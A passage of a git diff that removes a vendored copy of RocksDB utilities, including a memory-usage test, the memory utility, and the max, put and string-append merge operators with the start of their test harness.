-  MemoryTest() : kDbDir(test::TmpDir() + "/memory_test"), rnd_(301) {
-    assert(Env::Default()->CreateDirIfMissing(kDbDir).ok());
-  }
-
-  std::string GetDBName(int id) { return kDbDir + "db_" + ToString(id); }
-
-  std::string RandomString(int len) {
-    std::string r;
-    test::RandomString(&rnd_, len, &r);
-    return r;
-  }
-
-  void UpdateUsagesHistory(const std::vector<DB*>& dbs) {
-    std::map<MemoryUtil::UsageType, uint64_t> usage_by_type;
-    ASSERT_OK(GetApproximateMemoryUsageByType(dbs, &usage_by_type));
-    for (int i = 0; i < MemoryUtil::kNumUsageTypes; ++i) {
-      usage_history_[i].push_back(
-          usage_by_type[static_cast<MemoryUtil::UsageType>(i)]);
-    }
-  }
-
-  void GetCachePointersFromTableFactory(
-      const TableFactory* factory,
-      std::unordered_set<const Cache*>* cache_set) {
-    const BlockBasedTableFactory* bbtf =
-        dynamic_cast<const BlockBasedTableFactory*>(factory);
-    if (bbtf != nullptr) {
-      const auto bbt_opts = bbtf->table_options();
-      cache_set->insert(bbt_opts.block_cache.get());
-      cache_set->insert(bbt_opts.block_cache_compressed.get());
-    }
-  }
-
-  void GetCachePointers(const std::vector<DB*>& dbs,
-                        std::unordered_set<const Cache*>* cache_set) {
-    cache_set->clear();
-
-    for (auto* db : dbs) {
-      // Cache from DBImpl
-      StackableDB* sdb = dynamic_cast<StackableDB*>(db);
-      DBImpl* db_impl = dynamic_cast<DBImpl*>(sdb ? sdb->GetBaseDB() : db);
-      if (db_impl != nullptr) {
-        cache_set->insert(db_impl->TEST_table_cache());
-      }
-
-      // Cache from DBOptions
-      cache_set->insert(db->GetDBOptions().row_cache.get());
-
-      // Cache from table factories
-      std::unordered_map<std::string, const ImmutableCFOptions*> iopts_map;
-      if (db_impl != nullptr) {
-        ASSERT_OK(db_impl->TEST_GetAllImmutableCFOptions(&iopts_map));
-      }
-      for (auto pair : iopts_map) {
-        GetCachePointersFromTableFactory(pair.second->table_factory, cache_set);
-      }
-    }
-  }
-
-  Status GetApproximateMemoryUsageByType(
-      const std::vector<DB*>& dbs,
-      std::map<MemoryUtil::UsageType, uint64_t>* usage_by_type) {
-    std::unordered_set<const Cache*> cache_set;
-    GetCachePointers(dbs, &cache_set);
-
-    return MemoryUtil::GetApproximateMemoryUsageByType(dbs, cache_set,
-                                                       usage_by_type);
-  }
-
-  const std::string kDbDir;
-  Random rnd_;
-  std::vector<uint64_t> usage_history_[MemoryUtil::kNumUsageTypes];
-};
-
-TEST_F(MemoryTest, SharedBlockCacheTotal) {
-  std::vector<DB*> dbs;
-  std::vector<uint64_t> usage_by_type;
-  const int kNumDBs = 10;
-  const int kKeySize = 100;
-  const int kValueSize = 500;
-  Options opt;
-  opt.create_if_missing = true;
-  opt.write_buffer_size = kKeySize + kValueSize;
-  opt.max_write_buffer_number = 10;
-  opt.min_write_buffer_number_to_merge = 10;
-  opt.disable_auto_compactions = true;
-  BlockBasedTableOptions bbt_opts;
-  bbt_opts.block_cache = NewLRUCache(4096 * 1000 * 10);
-  for (int i = 0; i < kNumDBs; ++i) {
-    DestroyDB(GetDBName(i), opt);
-    DB* db = nullptr;
-    ASSERT_OK(DB::Open(opt, GetDBName(i), &db));
-    dbs.push_back(db);
-  }
-
-  std::vector<std::string> keys_by_db[kNumDBs];
-
-  // Fill one memtable per Put to make memtable use more memory.
-  for (int p = 0; p < opt.min_write_buffer_number_to_merge / 2; ++p) {
-    for (int i = 0; i < kNumDBs; ++i) {
-      for (int j = 0; j < 100; ++j) {
-        keys_by_db[i].emplace_back(RandomString(kKeySize));
-        dbs[i]->Put(WriteOptions(), keys_by_db[i].back(),
-                    RandomString(kValueSize));
-      }
-      dbs[i]->Flush(FlushOptions());
-    }
-  }
-  for (int i = 0; i < kNumDBs; ++i) {
-    for (auto& key : keys_by_db[i]) {
-      std::string value;
-      dbs[i]->Get(ReadOptions(), key, &value);
-    }
-    UpdateUsagesHistory(dbs);
-  }
-  for (size_t i = 1; i < usage_history_[MemoryUtil::kMemTableTotal].size();
-       ++i) {
-    // Expect EQ as we didn't flush more memtables.
-    ASSERT_EQ(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-  }
-  for (int i = 0; i < kNumDBs; ++i) {
-    delete dbs[i];
-  }
-}
-
-TEST_F(MemoryTest, MemTableAndTableReadersTotal) {
-  std::vector<DB*> dbs;
-  std::vector<uint64_t> usage_by_type;
-  std::vector<std::vector<ColumnFamilyHandle*>> vec_handles;
-  const int kNumDBs = 10;
-  const int kKeySize = 100;
-  const int kValueSize = 500;
-  Options opt;
-  opt.create_if_missing = true;
-  opt.create_missing_column_families = true;
-  opt.write_buffer_size = kKeySize + kValueSize;
-  opt.max_write_buffer_number = 10;
-  opt.min_write_buffer_number_to_merge = 10;
-  opt.disable_auto_compactions = true;
-
-  std::vector<ColumnFamilyDescriptor> cf_descs = {
-      {kDefaultColumnFamilyName, ColumnFamilyOptions(opt)},
-      {"one", ColumnFamilyOptions(opt)},
-      {"two", ColumnFamilyOptions(opt)},
-  };
-
-  for (int i = 0; i < kNumDBs; ++i) {
-    DestroyDB(GetDBName(i), opt);
-    std::vector<ColumnFamilyHandle*> handles;
-    dbs.emplace_back();
-    vec_handles.emplace_back();
-    ASSERT_OK(DB::Open(DBOptions(opt), GetDBName(i), cf_descs,
-                       &vec_handles.back(), &dbs.back()));
-  }
-
-  // Fill one memtable per Put to make memtable use more memory.
-  for (int p = 0; p < opt.min_write_buffer_number_to_merge / 2; ++p) {
-    for (int i = 0; i < kNumDBs; ++i) {
-      for (auto* handle : vec_handles[i]) {
-        dbs[i]->Put(WriteOptions(), handle, RandomString(kKeySize),
-                    RandomString(kValueSize));
-        UpdateUsagesHistory(dbs);
-      }
-    }
-  }
-  // Expect the usage history is monotonically increasing
-  for (size_t i = 1; i < usage_history_[MemoryUtil::kMemTableTotal].size();
-       ++i) {
-    ASSERT_GT(usage_history_[MemoryUtil::kMemTableTotal][i],
-              usage_history_[MemoryUtil::kMemTableTotal][i - 1]);
-    ASSERT_GT(usage_history_[MemoryUtil::kMemTableUnFlushed][i],
-              usage_history_[MemoryUtil::kMemTableUnFlushed][i - 1]);
-    ASSERT_EQ(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-  }
-
-  size_t usage_check_point = usage_history_[MemoryUtil::kMemTableTotal].size();
-  std::vector<Iterator*> iters;
-
-  // Create an iterator and flush all memtables for each db
-  for (int i = 0; i < kNumDBs; ++i) {
-    iters.push_back(dbs[i]->NewIterator(ReadOptions()));
-    dbs[i]->Flush(FlushOptions());
-
-    for (int j = 0; j < 100; ++j) {
-      std::string value;
-      dbs[i]->Get(ReadOptions(), RandomString(kKeySize), &value);
-    }
-
-    UpdateUsagesHistory(dbs);
-  }
-  for (size_t i = usage_check_point;
-       i < usage_history_[MemoryUtil::kMemTableTotal].size(); ++i) {
-    // Since memtables are pinned by iterators, we don't expect the
-    // memory usage of all the memtables decreases as they are pinned
-    // by iterators.
-    ASSERT_GE(usage_history_[MemoryUtil::kMemTableTotal][i],
-              usage_history_[MemoryUtil::kMemTableTotal][i - 1]);
-    // Expect the usage history from the "usage_decay_point" is
-    // monotonically decreasing.
-    ASSERT_LT(usage_history_[MemoryUtil::kMemTableUnFlushed][i],
-              usage_history_[MemoryUtil::kMemTableUnFlushed][i - 1]);
-    // Expect the usage history of the table readers increases
-    // as we flush tables.
-    ASSERT_GT(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-    ASSERT_GT(usage_history_[MemoryUtil::kCacheTotal][i],
-              usage_history_[MemoryUtil::kCacheTotal][i - 1]);
-  }
-  usage_check_point = usage_history_[MemoryUtil::kMemTableTotal].size();
-  for (int i = 0; i < kNumDBs; ++i) {
-    delete iters[i];
-    UpdateUsagesHistory(dbs);
-  }
-  for (size_t i = usage_check_point;
-       i < usage_history_[MemoryUtil::kMemTableTotal].size(); ++i) {
-    // Expect the usage of all memtables decreasing as we delete iterators.
-    ASSERT_LT(usage_history_[MemoryUtil::kMemTableTotal][i],
-              usage_history_[MemoryUtil::kMemTableTotal][i - 1]);
-    // Since the memory usage of un-flushed memtables is only affected
-    // by Put and flush, we expect EQ here as we only delete iterators.
-    ASSERT_EQ(usage_history_[MemoryUtil::kMemTableUnFlushed][i],
-              usage_history_[MemoryUtil::kMemTableUnFlushed][i - 1]);
-    // Expect EQ as we didn't flush more memtables.
-    ASSERT_EQ(usage_history_[MemoryUtil::kTableReadersTotal][i],
-              usage_history_[MemoryUtil::kTableReadersTotal][i - 1]);
-  }
-
-  for (int i = 0; i < kNumDBs; ++i) {
-    for (auto* handle : vec_handles[i]) {
-      delete handle;
-    }
-    delete dbs[i];
-  }
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-#if !(defined NDEBUG) || !defined(OS_WIN)
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
-
-#else
-#include <cstdio>
-
-int main(int argc, char** argv) {
-  printf("Skipped in RocksDBLite as utilities are not supported.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/memory/memory_util.cc b/thirdparty/rocksdb/utilities/memory/memory_util.cc
deleted file mode 100644
index 83bf33c..0000000
--- a/thirdparty/rocksdb/utilities/memory/memory_util.cc
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/memory_util.h"
-
-#include "db/db_impl.h"
-
-namespace rocksdb {
-
-Status MemoryUtil::GetApproximateMemoryUsageByType(
-    const std::vector<DB*>& dbs,
-    const std::unordered_set<const Cache*> cache_set,
-    std::map<MemoryUtil::UsageType, uint64_t>* usage_by_type) {
-  usage_by_type->clear();
-
-  // MemTable
-  for (auto* db : dbs) {
-    uint64_t usage = 0;
-    if (db->GetAggregatedIntProperty(DB::Properties::kSizeAllMemTables,
-                                     &usage)) {
-      (*usage_by_type)[MemoryUtil::kMemTableTotal] += usage;
-    }
-    if (db->GetAggregatedIntProperty(DB::Properties::kCurSizeAllMemTables,
-                                     &usage)) {
-      (*usage_by_type)[MemoryUtil::kMemTableUnFlushed] += usage;
-    }
-  }
-
-  // Table Readers
-  for (auto* db : dbs) {
-    uint64_t usage = 0;
-    if (db->GetAggregatedIntProperty(DB::Properties::kEstimateTableReadersMem,
-                                     &usage)) {
-      (*usage_by_type)[MemoryUtil::kTableReadersTotal] += usage;
-    }
-  }
-
-  // Cache
-  for (const auto* cache : cache_set) {
-    if (cache != nullptr) {
-      (*usage_by_type)[MemoryUtil::kCacheTotal] += cache->GetUsage();
-    }
-  }
-
-  return Status::OK();
-}
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/merge_operators.h b/thirdparty/rocksdb/utilities/merge_operators.h
deleted file mode 100644
index 72f805a..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators.h
+++ /dev/null
@@ -1,54 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef MERGE_OPERATORS_H
-#define MERGE_OPERATORS_H
-
-#include <memory>
-#include <stdio.h>
-
-#include "rocksdb/merge_operator.h"
-
-namespace rocksdb {
-
-class MergeOperators {
- public:
-  static std::shared_ptr<MergeOperator> CreatePutOperator();
-  static std::shared_ptr<MergeOperator> CreateDeprecatedPutOperator();
-  static std::shared_ptr<MergeOperator> CreateUInt64AddOperator();
-  static std::shared_ptr<MergeOperator> CreateStringAppendOperator();
-  static std::shared_ptr<MergeOperator> CreateStringAppendTESTOperator();
-  static std::shared_ptr<MergeOperator> CreateMaxOperator();
-  static std::shared_ptr<MergeOperator> CreateCassandraMergeOperator();
-
-  // Will return a different merge operator depending on the string.
-  // TODO: Hook the "name" up to the actual Name() of the MergeOperators?
-  static std::shared_ptr<MergeOperator> CreateFromStringId(
-      const std::string& name) {
-    if (name == "put") {
-      return CreatePutOperator();
-    } else if (name == "put_v1") {
-      return CreateDeprecatedPutOperator();
-    } else if ( name == "uint64add") {
-      return CreateUInt64AddOperator();
-    } else if (name == "stringappend") {
-      return CreateStringAppendOperator();
-    } else if (name == "stringappendtest") {
-      return CreateStringAppendTESTOperator();
-    } else if (name == "max") {
-      return CreateMaxOperator();
-    } else if (name == "cassandra") {
-      return CreateCassandraMergeOperator();
-    } else {
-      // Empty or unknown, just return nullptr
-      return nullptr;
-    }
-  }
-
-};
-
-} // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/merge_operators/max.cc b/thirdparty/rocksdb/utilities/merge_operators/max.cc
deleted file mode 100644
index 5f42e81..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/max.cc
+++ /dev/null
@@ -1,77 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "utilities/merge_operators.h"
-
-using rocksdb::Slice;
-using rocksdb::Logger;
-using rocksdb::MergeOperator;
-
-namespace {  // anonymous namespace
-
-// Merge operator that picks the maximum operand, Comparison is based on
-// Slice::compare
-class MaxOperator : public MergeOperator {
- public:
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    Slice& max = merge_out->existing_operand;
-    if (merge_in.existing_value) {
-      max = Slice(merge_in.existing_value->data(),
-                  merge_in.existing_value->size());
-    } else if (max.data() == nullptr) {
-      max = Slice();
-    }
-
-    for (const auto& op : merge_in.operand_list) {
-      if (max.compare(op) < 0) {
-        max = op;
-      }
-    }
-
-    return true;
-  }
-
-  virtual bool PartialMerge(const Slice& key, const Slice& left_operand,
-                            const Slice& right_operand, std::string* new_value,
-                            Logger* logger) const override {
-    if (left_operand.compare(right_operand) >= 0) {
-      new_value->assign(left_operand.data(), left_operand.size());
-    } else {
-      new_value->assign(right_operand.data(), right_operand.size());
-    }
-    return true;
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    Slice max;
-    for (const auto& operand : operand_list) {
-      if (max.compare(operand) < 0) {
-        max = operand;
-      }
-    }
-
-    new_value->assign(max.data(), max.size());
-    return true;
-  }
-
-  virtual const char* Name() const override { return "MaxOperator"; }
-};
-
-}  // end of anonymous namespace
-
-namespace rocksdb {
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateMaxOperator() {
-  return std::make_shared<MaxOperator>();
-}
-}
diff --git a/thirdparty/rocksdb/utilities/merge_operators/put.cc b/thirdparty/rocksdb/utilities/merge_operators/put.cc
deleted file mode 100644
index 7f206ad..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/put.cc
+++ /dev/null
@@ -1,89 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-using namespace rocksdb;
-
-namespace { // anonymous namespace
-
-// A merge operator that mimics Put semantics
-// Since this merge-operator will not be used in production,
-// it is implemented as a non-associative merge operator to illustrate the
-// new interface and for testing purposes. (That is, we inherit from
-// the MergeOperator class rather than the AssociativeMergeOperator
-// which would be simpler in this case).
-//
-// From the client-perspective, semantics are the same.
-class PutOperator : public MergeOperator {
- public:
-  virtual bool FullMerge(const Slice& key,
-                         const Slice* existing_value,
-                         const std::deque<std::string>& operand_sequence,
-                         std::string* new_value,
-                         Logger* logger) const override {
-    // Put basically only looks at the current/latest value
-    assert(!operand_sequence.empty());
-    assert(new_value != nullptr);
-    new_value->assign(operand_sequence.back());
-    return true;
-  }
-
-  virtual bool PartialMerge(const Slice& key,
-                            const Slice& left_operand,
-                            const Slice& right_operand,
-                            std::string* new_value,
-                            Logger* logger) const override {
-    new_value->assign(right_operand.data(), right_operand.size());
-    return true;
-  }
-
-  using MergeOperator::PartialMergeMulti;
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override {
-    new_value->assign(operand_list.back().data(), operand_list.back().size());
-    return true;
-  }
-
-  virtual const char* Name() const override {
-    return "PutOperator";
-  }
-};
-
-class PutOperatorV2 : public PutOperator {
-  virtual bool FullMerge(const Slice& key, const Slice* existing_value,
-                         const std::deque<std::string>& operand_sequence,
-                         std::string* new_value,
-                         Logger* logger) const override {
-    assert(false);
-    return false;
-  }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    // Put basically only looks at the current/latest value
-    assert(!merge_in.operand_list.empty());
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-};
-
-} // end of anonymous namespace
-
-namespace rocksdb {
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateDeprecatedPutOperator() {
-  return std::make_shared<PutOperator>();
-}
-
-std::shared_ptr<MergeOperator> MergeOperators::CreatePutOperator() {
-  return std::make_shared<PutOperatorV2>();
-}
-}
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.cc b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.cc
deleted file mode 100644
index ff19348..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.cc
+++ /dev/null
@@ -1,57 +0,0 @@
-/**
- * A MergeOperator for rocksdb that implements string append.
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#include "stringappend.h"
-
-#include <memory>
-#include <assert.h>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// Constructor: also specify the delimiter character.
-StringAppendOperator::StringAppendOperator(char delim_char)
-    : delim_(delim_char) {
-}
-
-// Implementation for the merge operation (concatenates two strings)
-bool StringAppendOperator::Merge(const Slice& key,
-                                 const Slice* existing_value,
-                                 const Slice& value,
-                                 std::string* new_value,
-                                 Logger* logger) const {
-
-  // Clear the *new_value for writing.
-  assert(new_value);
-  new_value->clear();
-
-  if (!existing_value) {
-    // No existing_value. Set *new_value = value
-    new_value->assign(value.data(),value.size());
-  } else {
-    // Generic append (existing_value != null).
-    // Reserve *new_value to correct size, and apply concatenation.
-    new_value->reserve(existing_value->size() + 1 + value.size());
-    new_value->assign(existing_value->data(),existing_value->size());
-    new_value->append(1,delim_);
-    new_value->append(value.data(), value.size());
-  }
-
-  return true;
-}
-
-const char* StringAppendOperator::Name() const  {
-  return "StringAppendOperator";
-}
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateStringAppendOperator() {
-  return std::make_shared<StringAppendOperator>(',');
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.h b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.h
deleted file mode 100644
index 621d151..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend.h
+++ /dev/null
@@ -1,31 +0,0 @@
-/**
- * A MergeOperator for rocksdb that implements string append.
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#pragma once
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class StringAppendOperator : public AssociativeMergeOperator {
- public:
-  // Constructor: specify delimiter
-  explicit StringAppendOperator(char delim_char);
-
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const override;
-
-  virtual const char* Name() const override;
-
- private:
-  char delim_;         // The delimiter is inserted between elements
-
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.cc b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.cc
deleted file mode 100644
index 2d7b742..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.cc
+++ /dev/null
@@ -1,117 +0,0 @@
-/**
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#include "stringappend2.h"
-
-#include <memory>
-#include <string>
-#include <assert.h>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// Constructor: also specify the delimiter character.
-StringAppendTESTOperator::StringAppendTESTOperator(char delim_char)
-    : delim_(delim_char) {
-}
-
-// Implementation for the merge operation (concatenates two strings)
-bool StringAppendTESTOperator::FullMergeV2(
-    const MergeOperationInput& merge_in,
-    MergeOperationOutput* merge_out) const {
-  // Clear the *new_value for writing.
-  merge_out->new_value.clear();
-
-  if (merge_in.existing_value == nullptr && merge_in.operand_list.size() == 1) {
-    // Only one operand
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-
-  // Compute the space needed for the final result.
-  size_t numBytes = 0;
-  for (auto it = merge_in.operand_list.begin();
-       it != merge_in.operand_list.end(); ++it) {
-    numBytes += it->size() + 1;   // Plus 1 for the delimiter
-  }
-
-  // Only print the delimiter after the first entry has been printed
-  bool printDelim = false;
-
-  // Prepend the *existing_value if one exists.
-  if (merge_in.existing_value) {
-    merge_out->new_value.reserve(numBytes + merge_in.existing_value->size());
-    merge_out->new_value.append(merge_in.existing_value->data(),
-                                merge_in.existing_value->size());
-    printDelim = true;
-  } else if (numBytes) {
-    merge_out->new_value.reserve(
-        numBytes - 1);  // Minus 1 since we have one less delimiter
-  }
-
-  // Concatenate the sequence of strings (and add a delimiter between each)
-  for (auto it = merge_in.operand_list.begin();
-       it != merge_in.operand_list.end(); ++it) {
-    if (printDelim) {
-      merge_out->new_value.append(1, delim_);
-    }
-    merge_out->new_value.append(it->data(), it->size());
-    printDelim = true;
-  }
-
-  return true;
-}
-
-bool StringAppendTESTOperator::PartialMergeMulti(
-    const Slice& key, const std::deque<Slice>& operand_list,
-    std::string* new_value, Logger* logger) const {
-  return false;
-}
-
-// A version of PartialMerge that actually performs "partial merging".
-// Use this to simulate the exact behaviour of the StringAppendOperator.
-bool StringAppendTESTOperator::_AssocPartialMergeMulti(
-    const Slice& key, const std::deque<Slice>& operand_list,
-    std::string* new_value, Logger* logger) const {
-  // Clear the *new_value for writing
-  assert(new_value);
-  new_value->clear();
-  assert(operand_list.size() >= 2);
-
-  // Generic append
-  // Determine and reserve correct size for *new_value.
-  size_t size = 0;
-  for (const auto& operand : operand_list) {
-    size += operand.size();
-  }
-  size += operand_list.size() - 1;  // Delimiters
-  new_value->reserve(size);
-
-  // Apply concatenation
-  new_value->assign(operand_list.front().data(), operand_list.front().size());
-
-  for (std::deque<Slice>::const_iterator it = operand_list.begin() + 1;
-       it != operand_list.end(); ++it) {
-    new_value->append(1, delim_);
-    new_value->append(it->data(), it->size());
-  }
-
-  return true;
-}
-
-const char* StringAppendTESTOperator::Name() const  {
-  return "StringAppendTESTOperator";
-}
-
-
-std::shared_ptr<MergeOperator>
-MergeOperators::CreateStringAppendTESTOperator() {
-  return std::make_shared<StringAppendTESTOperator>(',');
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.h b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.h
deleted file mode 100644
index d979f14..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend2.h
+++ /dev/null
@@ -1,48 +0,0 @@
-/**
- * A TEST MergeOperator for rocksdb that implements string append.
- * It is built using the MergeOperator interface rather than the simpler
- * AssociativeMergeOperator interface. This is useful for testing/benchmarking.
- * While the two operators are semantically the same, all production code
- * should use the StringAppendOperator defined in stringappend.{h,cc}. The
- * operator defined in the present file is primarily for testing.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#pragma once
-#include <deque>
-#include <string>
-
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class StringAppendTESTOperator : public MergeOperator {
- public:
-  // Constructor with delimiter
-  explicit StringAppendTESTOperator(char delim_char);
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override;
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override;
-
-  virtual const char* Name() const override;
-
- private:
-  // A version of PartialMerge that actually performs "partial merging".
-  // Use this to simulate the exact behaviour of the StringAppendOperator.
-  bool _AssocPartialMergeMulti(const Slice& key,
-                               const std::deque<Slice>& operand_list,
-                               std::string* new_value, Logger* logger) const;
-
-  char delim_;         // The delimiter is inserted between elements
-
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend_test.cc b/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend_test.cc
deleted file mode 100644
index a12e130..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/string_append/stringappend_test.cc
+++ /dev/null
@@ -1,600 +0,0 @@
-/**
- * An persistent map : key -> (list of strings), using rocksdb merge.
- * This file is a test-harness / use-case for the StringAppendOperator.
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook, Inc.
-*/
-
-#include <iostream>
-#include <map>
-
-#include "rocksdb/db.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "utilities/merge_operators.h"
-#include "utilities/merge_operators/string_append/stringappend.h"
-#include "utilities/merge_operators/string_append/stringappend2.h"
-#include "util/testharness.h"
-#include "util/random.h"
-
-using namespace rocksdb;
-
-namespace rocksdb {
-
-// Path to the database on file system
-const std::string kDbName = test::TmpDir() + "/stringappend_test";
-
-namespace {
-// OpenDb opens a (possibly new) rocksdb database with a StringAppendOperator
-std::shared_ptr<DB> OpenNormalDb(char delim_char) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new StringAppendOperator(delim_char));
-  EXPECT_OK(DB::Open(options, kDbName, &db));
-  return std::shared_ptr<DB>(db);
-}
-
-#ifndef ROCKSDB_LITE  // TtlDb is not supported in Lite
-// Open a TtlDB with a non-associative StringAppendTESTOperator
-std::shared_ptr<DB> OpenTtlDb(char delim_char) {
-  DBWithTTL* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new StringAppendTESTOperator(delim_char));
-  EXPECT_OK(DBWithTTL::Open(options, kDbName, &db, 123456));
-  return std::shared_ptr<DB>(db);
-}
-#endif  // !ROCKSDB_LITE
-}  // namespace
-
-/// StringLists represents a set of string-lists, each with a key-index.
-/// Supports Append(list, string) and Get(list)
-class StringLists {
- public:
-
-  //Constructor: specifies the rocksdb db
-  /* implicit */
-  StringLists(std::shared_ptr<DB> db)
-      : db_(db),
-        merge_option_(),
-        get_option_() {
-    assert(db);
-  }
-
-  // Append string val onto the list defined by key; return true on success
-  bool Append(const std::string& key, const std::string& val){
-    Slice valSlice(val.data(), val.size());
-    auto s = db_->Merge(merge_option_, key, valSlice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  // Returns the list of strings associated with key (or "" if does not exist)
-  bool Get(const std::string& key, std::string* const result){
-    assert(result != nullptr); // we should have a place to store the result
-    auto s = db_->Get(get_option_, key, result);
-
-    if (s.ok()) {
-      return true;
-    }
-
-    // Either key does not exist, or there is some error.
-    *result = "";       // Always return empty string (just for convention)
-
-    //NotFound is okay; just return empty (similar to std::map)
-    //But network or db errors, etc, should fail the test (or at least yell)
-    if (!s.IsNotFound()) {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-    }
-
-    // Always return false if s.ok() was not true
-    return false;
-  }
-
-
- private:
-  std::shared_ptr<DB> db_;
-  WriteOptions merge_option_;
-  ReadOptions get_option_;
-
-};
-
-
-// The class for unit-testing
-class StringAppendOperatorTest : public testing::Test {
- public:
-  StringAppendOperatorTest() {
-    DestroyDB(kDbName, Options());    // Start each test with a fresh DB
-  }
-
-  typedef std::shared_ptr<DB> (* OpenFuncPtr)(char);
-
-  // Allows user to open databases with different configurations.
-  // e.g.: Can open a DB or a TtlDB, etc.
-  static void SetOpenDbFunction(OpenFuncPtr func) {
-    OpenDb = func;
-  }
-
- protected:
-  static OpenFuncPtr OpenDb;
-};
-StringAppendOperatorTest::OpenFuncPtr StringAppendOperatorTest::OpenDb = nullptr;
-
-// THE TEST CASES BEGIN HERE
-
-TEST_F(StringAppendOperatorTest, IteratorTest) {
-  auto db_ = OpenDb(',');
-  StringLists slists(db_);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  slists.Append("k2", "a1");
-  slists.Append("k2", "a2");
-  slists.Append("k2", "a3");
-
-  std::string res;
